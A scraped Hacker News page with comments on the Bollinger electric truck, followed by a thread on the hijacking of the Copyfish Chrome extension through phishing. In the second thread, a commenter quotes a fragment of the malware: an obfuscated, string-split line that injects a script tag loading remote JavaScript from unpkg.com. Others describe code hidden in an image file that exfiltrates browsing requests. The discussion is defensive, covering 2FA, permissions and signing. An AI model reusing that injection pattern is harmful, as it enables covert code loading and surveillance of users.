Edit: The style seems heavily inspired by the original Ford Bronco. They even support the removable rear top. http://classicfordbroncos.com/builds/

kylehotchkiss 3 days ago 2 replies      
Wonder if they need a torque converter still to give it a little more oomph off road.

Also: "It also bucks the high-tech trend of new cars in general. There will be a radio with an AM/FM receiver, Bluetooth connectivity, and an AUX input, but theres no touchscreen." I hope this becomes a trend. Touchscreens in cars are horrible ux.

burger_moon 4 days ago 3 replies      
Can you recharge these on a normal gas generator? Something like a Miller engine driven generator[1] could probably do it but those are $$$ for the average joe. I only ask because a lot of people trailer their rock crawlers/mudders to more remote areas to go play and have fun, but when the electricity runs dry you'll need a way to power it back up. This thing looks like it'd be a lot of fun not only for daily use but also for backwoods offroading.

[1] https://www.millerwelds.com/equipment/welders/engine-driven/...

jay-anderson 3 days ago 0 replies      
> theres no touchscreen

I like this. Feels like many new cars are adding in a screen (touch or otherwise) while I prefer cars without it.

Animats 3 days ago 3 replies      
It's encouraging to see this. It's about time for electric pickup trucks. The price point ($60K) is going to be a problem for work trucks.

They talk about high speed, not low-speed high-torque. They don't say much about how the drivetrain behaves at low speed. Do they have locking differentials, or something that prevents wheel spin? It's a two-motor system. Does the motor control system know how to keep the front and back wheels in sync when traction is bad? You don't have a front-to-back differential; that's a software operation here. How good is very low speed, high-torque operation? There's no shifting, so you have to do low-speed control in software. With good software and differentials, this could be a good rock-crawler. Can you pull a stump with this thing? They should be able to do this, assuming they're using 3-phase motors like everybody else today.

Providing 120VAC power out is a nice feature. They don't say much about charging. It should carry a charger that can charge from 120/240VAC, so you could charge slowly from any power outlet if you have to. Or another Bollinger. You'd have a big charger at home base, but opportunistic charging is a necessity when you're far from charging stations.

Really needs air bags, and fewer sharp edges in the passenger compartment. Off-road that thing and you'll cut yourself on the door handles. Once they find a real manufacturer, they can clean up the interior.

Does it have a heater? That's a big problem with electrics, especially ones like this with no insulation.

[1] http://bollingermotors.com

aliston 3 days ago 1 reply      
I've been looking at buying an electric car recently and was surprised that the list of electic SUVs is really small. There's basically the Model X and not all that much more. The Rav4 got discontinued.

It seems to me that this is a huge market opportunity. The technology is right on the cusp of being very practical in terms of range. Soccer moms who commute to the grocery store and occasionally go on a trip to the mountains want a car with room and 4WD. If such a car existed, they would be shouting "take my money!" Not quite sure why the car manufacturers aren't building these things.

criddell 4 days ago 1 reply      
I wonder if the rise of electric vehicles is re-igniting the kit-car industry.

I still think about some of the kits from the 1970's.

For example:https://en.wikipedia.org/wiki/Kit_car#/media/File:3-4Nose.jp...

JohnJamesRambo 4 days ago 1 reply      
That looks amazing. I'd buy that in a heartbeat if I ever allowed myself to buy new cars.
macintux 3 days ago 0 replies      
Jalopnik just posted a good analysis of the design: http://jalopnik.com/the-bollinger-electric-truck-uses-an-ide...
jschwartzi 4 days ago 2 replies      
I've been wanting something like this for years. It doesn't seem like any car company is building an all-electric truck.
donavanm 3 days ago 0 replies      
I really want one. Theres no reasonable modern adventure/utility truck on the market. Icons are nice but $$$. Same for all the other modern after market conversions. Like many others Ive settled on a 30 year old truck (4runner/hilux surf) for this niche.

but... the complex suspension worries me. Fungibility or flexibility yes, but massive adjustability sounds fragile and complex. Dual drive sure, but it must have some sort of LSD. Which isnt mentuoned. 200 miles is a really short range. I can do 300+ on my stock tank and its not enough. Last 4 day weekend in the cascades/palouse/okanogan was about 700 miles. Practical recharging in the rural/wilds is .... unlikely.

As mentioned until theres real capital and manufacturing this is vaporware. Im also skeptical of $60,000, I'll bet real money against that. Icon, a small batch truck manufacturer with real product, is more like $100-150,00 and up.

Edit: entry and exit angles look nice. Real curious how that "plate" style chassis handles flex.

willvarfar 3 days ago 1 reply      
Given that it doesn't need a bonnet, its a shame it isn't more styled on https://en.wikipedia.org/wiki/Volvo_L3314

But I definitely want one! :)

Shivetya 3 days ago 0 replies      
still think the best place is school buses. you know where they will be parked and their exact routes. plus you get kids and parents used to electric vehicles on an every day use.

yes they are expensive but all it takes is a spike in gas prices to seriously hurt some districts who got hit hard the last time it went high.

there are many markets for vehicles which have set operation ranges and known routes. EV tech ain't near replacing combustion in many cases but in tightly controlled instances it does work. (range, charging, weather, and cost are the four areas all being worked on and all needing work)

dghughes 3 days ago 1 reply      
His frustration with his trucks I bet it because they were powered by gas. Trucks should only be diesel you don't need horsepower (fast time to cover a distance) you need leverage aka torque.

A documentary on Sherman tanks amazed me because they were gas powered and when hit gasoline exploded. German tanks were powered by diesel. The US has hated diesel from day one it's amazing.

But electric has tons of torque by design it should be suitable. But I wonder if the horsepower can be dialed down for more range?

vivekd 3 days ago 0 replies      
I wonder why there aren't more EV trailers on the road, a trucking company would be more willing to absorb the higher initial costs of an electric truck in order to save on fuel down the line. Is it because EV can't effectively compete in terms of fuel costs against to long range you get with diesel. Or is it just short sightedness among manufacturers

EDIT: actually looks like I spoke too soon:




Vinalin 3 days ago 0 replies      
I feel there's a huge lack of electric/hybrid vehicles in the truck/pickup space, although for understandable reason. However I've heard of a company that's working on a fleet version of an eletric pickup truck and I think they're now looking for client interest.[0]

The caveat is that it's not fully electric. 80 mile all-electric and then the generator kicks in, giving it 310 miles per tank. However pretty good gas mileage and safety was definitely a concern.

[0]: http://workhorse.com/

6stringmerc 4 days ago 1 reply      
Fascinating approach and re-thinking of a utility vehicle. I'm thinking the 10,000 - 20,000 units is pretty ambitious. Hence why The Verge politely just mentions that Bollinger hasn't figured out a "final price" yet but fails to mention what a "current estimate of final price" might be.

When I think of utility vehicles, I think of Defender 90 and Toyota Hilux type vehicles - spartan, proven, reparable in many parts of the world. When I think of a new car model, even from large manufacturers, I get the jitters of being a first-adopter. So much gets learned and shaken out by real-world, human use. Nice idea, but I'm a dreamer at heart and through receiving lots of pragmatic feedback, I kind of see this through the same lens.

cr0sh 3 days ago 1 reply      
Well - it's nice to finally see another potential player in this arena; we've seen this one I think:


But both of these are well outside of my price range. But it has to start somewhere.

The thing I've feared/worried about when it has come to the push for electric, and self-driving vehicles, and the recent rumblings by France and the UK to ban ICE vehicles in the near future - is that those who enjoy off-roading are being left out.

carsongross 3 days ago 0 replies      
Dear Toyota: look at this truck, and at the FJ40, and get to work.
guntars 3 days ago 0 replies      
They should add a 3kW+ inverter option to use all your favorite electric tools in the field, making this basically a large battery on wheels.
athenot 3 days ago 0 replies      
Great low-speed torque and hydraulic suspension would be great features for offroading, especially crawling on really tricky/fun terrain.
dsfyu404ed 3 days ago 1 reply      
It had better be a lot cheaper than an F150.

Nobody who wants a truck for truck stuff is gonna put up with the downsides of electric and the NVH of a 60s panel van and 200mi range unless it costs much less than vehicles with equivalent performance.

The people who buy electric to make a statement about their preference in power sources are not the people who will buy a bare-bones truck.

frik 3 days ago 0 replies      
Looks like this is inspired by the famous Mercedes G/Puch G.

For more then 3 decades it is well known for its boxy style and its benefits: https://en.wikipedia.org/wiki/Mercedes-Benz_G-Class (scroll down for pictures)

simonb 3 days ago 0 replies      
Looks really interesting and promising, but why didn't they make it front control like the Land Rover FC101.
yellowapple 4 days ago 0 replies      
I've been dreaming of a car like this for a long while now. Even down to its boxy look and the fact that it looks like it won't get stuck in an inch-high snow drift.

They won't even start accepting deposits until 2018, apparently. Gives me more time to save up for this beauty.

rhspeer 4 days ago 1 reply      
This could be a nice acquisition by Jeep/Chrysler since they're lagging behind in EV development due to lack of funds.

It would also help get the taste of the compass & patriot horseshit they've been peddling lately.

That's some beautiful vaporware, I hope they make it.

alkonaut 3 days ago 0 replies      
Cool. But it's DOA if it doesn't meet safety standards. People might accept 4/5 NCAP stars but not for a premium car. Lack of airbag is concerning but might be fixed before the production model is finished I suppose.
0xbear 3 days ago 0 replies      
That steering column will look mighty impressive when the driver impales herself on it in a crash. I wonder what NHTSA thinks of non-crumpling columns and steering wheels with no air bag.
kevin_thibedeau 2 days ago 0 replies      
Wonder what the range would be if it didn't have the aerodynamics of a brick.
bobwaycott 3 days ago 0 replies      
Its an electric Land Rover Defender clone. Still cool, though. But definitely not original in design at all.
bitJericho 3 days ago 0 replies      
Is this the next DMC? I don't know. But I want one!
goneri 3 days ago 0 replies      
If you are also confused by the units:

360HP: 268kW, 200 mile: 321.869km

jacobmarble 4 days ago 1 reply      
"He just happens to be doing it in the middle of goddamned nowhere."

I left Southern California for this. My current employer is hiring software engineers in Sandpoint, Idaho.


sabujp 3 days ago 0 replies      
was expecting a semi truck
geiseric 4 days ago 0 replies      
Looks like my Land Rover.
towndrunk 3 days ago 0 replies      
Needs a hood scoop. :)
flareback 4 days ago 2 replies      
It's not a truck
olegkikin 4 days ago 2 replies      
Don't they need their own battery gigafactory to scale the production?
backtoyoujim 3 days ago 0 replies      
reminds me of Maurice Wilks early Land Rover designs.
apl002 3 days ago 0 replies      
dat truck is sexy
frabbit 4 days ago 1 reply      
Hopefully these will be restricted to use on farmland instead of being inappropriately paraded in suburban areas.

Electric vehicles are not "clean", they're merely cleaner.

Our Copyfish extension was stolen and adware-infested a9t9.com
326 points by timr  1 day ago   200 comments top 30
krackers 1 day ago 7 replies      
I guess this is as good a place as any to post that I noticed something similar had happened to [User-Agent Switcher for Google Chrome](https://chrome.google.com/webstore/detail/user-agent-switche...) and [Block Site](https://chrome.google.com/webstore/detail/block-site/eiimnmi...). The "report abuse" link on the page is useless. The former is very insidious in that it actually hides the malware in a .jpg file that appears benign at first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas element and decoded in some manner yields js that goes on to send all the user's http requests to some domain while also injecting ads and redirecting to affiliate links.
jeswin 1 day ago 5 replies      
Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action. While this will be an interesting UX challenge, defaulting to domain-specific permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.

IncRnd 1 day ago 7 replies      
> Click here to read more details the email said. The click opened the Google password dialog, and the unlucky team member entered the password for our developer account. This looked all legit to the team member, so we did not notice the pishing attack as such at this point. Pishing for Chrome extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.

timdorr 1 day ago 1 reply      
Looks like they are using unpkg.com and npm to distribute the badware:



I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.

joshschreuder 1 day ago 1 reply      
A similar attack happened on another Chrome extension last month (Social Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled:https://www.facebook.com/socialfixer/posts/10155117415829342

I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.

mikegerwitz 1 day ago 1 reply      
This is why it is important to cryptographically sign releases. Browsers are a huge problem with this.

All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.

(Maybe there is some code signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)

flyGuyOnTheSly 1 day ago 2 replies      
This is the second extension that I use on chrome that has been hijacked.

The first was live http headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0] https://www.webmasterworld.com/webmaster/4829365.htm

userbinator 1 day ago 0 replies      
The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace the origin.
busterarm 1 day ago 0 replies      
It's a bad weekend for Chrome Extensions, it seems.


gargravarr 1 day ago 0 replies      
Spear phishing is remarkably effective, even against tech-savvy people. One of the most alarming aspects is that we've become trained to click links in emails as soon as we see some trustworthy indication, be it something we were expecting, a spoofed sender or copying Google's layout, further re-enforced by an accurate login page clone.

I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.

Seems we need to stop trusting email.

ivanbakel 1 day ago 2 replies      
Good reminder that you should never be in the mindset of "expecting" a phish from any source - trust is how they get you. Also, if a message was really urgent, you wouldn't have to click-through to see it.
bjornstar 1 day ago 0 replies      
I've gotten this phishing e-mail 3 times over the past month or so. The first time I almost fell for it.

Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(

yrro 5 hours ago 0 replies      
Debian patched the Chromium browser to refuse to install or update add-ons from the Chrome store. At first I found this annoying, but I am coming around to their way of thinking--that ultimately I can only trust software in the Debian archive.
staticautomatic 1 day ago 2 replies      
Of course it's a phishing attack. Why would Google send you a bit.ly link to your own Google account?
tedunangst 1 day ago 0 replies      
Something to be said about auto updating software...
thadk 1 day ago 0 replies      
FYI, This "Better History" extension in Chrome has a history of selling browser history since it was sold by its developer: https://chrome.google.com/webstore/detail/better-history/obc...

They frequently remove it from the store when people notice and restore it a or so month later.

The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.

Cthulhu_ 1 day ago 0 replies      
No 2FA? No additional password / 2FA challenge when a big, dangerous operation like moving an extension to another account is triggered?
sgroppino 1 day ago 3 replies      
I'd have though that two-factor authentication could have prevented this type of attack?
tarosnow 1 day ago 0 replies      
You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the activity of your apps and extensions.

[1]: https://chrome.google.com/webstore/detail/chrome-apps-extens...

sunnyps 1 day ago 0 replies      
Please use Google's "Password Alert" Chrome extension to protect your Google account. It will notify you if you accidentally enter your Google password on another website.
cgb223 1 day ago 2 replies      
Can someone explain to me why the attacker wrote the script source tag as

 "var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
Instead of just:

 var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';

jwilk 1 day ago 1 reply      
> Back to standard, text-based email as the default.

Yeah, but what will you do when your receive an HTML-only mail, or a mail with text/plain alternative saying "lol, get a better MUA", or a mail with text/plain alternative so mangled it can't be read without making your brain hurt?

All these are common occurrences in automatically sent e-mails these days.

interfixus 1 day ago 0 replies      
tl;dr: A member of the development team thought it unexceptional and credible that Google should be using a clickable bit.ly url in an unsolicited email asking for login and update.

The world is an uphill kind of place.

Endy 1 day ago 2 replies      
While I understand how some people can take this as a cautionary tale in favor of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is very simple. There's the old saw that over time, computing has evolved from smart people in front of dumb terminals into dumb people in front of "smart" terminals. This attack is proof of it; and while 2FA might have had an impact, the major issue here is that we had a dumb person - this "unlucky" team member - who either didn't have the training or the common sense to understand that if you have a public presence on the Internet, you are a target. If you have auto-updating software installed on more than 1 machine, you are going to be someone's target because they want access to that person's computer.

The lesson here is: never trust anyone or anything.

shawn-butler 1 day ago 0 replies      
>> We are trying to contact Google, but so far, have been unable to reach any human being that can help.

So typical, unfortunately.

_Codemonkeyism 1 day ago 0 replies      
"This looked all legit to the team member" sure the team member checked the URL of the password screen? Yes, and Google using Freshdesk.
Rainymood 1 day ago 1 reply      
(In the article "phishing" is consistently misspelled as "pishing".)
logicallee 1 day ago 3 replies      
We should never have to read a title "disable immediately" by a developer. In a news article. That is not how this should be distributed, in case the original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.

How it should work.


1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other acccess."

2. A web form people can submit revocation codes to, from anywhere with Internet access.

The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.

I personally would generate it using a dicewords-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy of which one third is a recovery checksum. This enables the developer to write many words down wrong and still be able to disable their extension. In case the recovery record/checksum portion were used, I would offer the user the result "You appeared to have made a mistake which we could correct. Is this the correct disable key?" then show the corrected version.

However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first wrote about this:


sneak 1 day ago 0 replies      
TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.
nvr219 1 day ago 0 replies      
Always do a 2fa
       cached 1 August 2017 15:11:01 GMT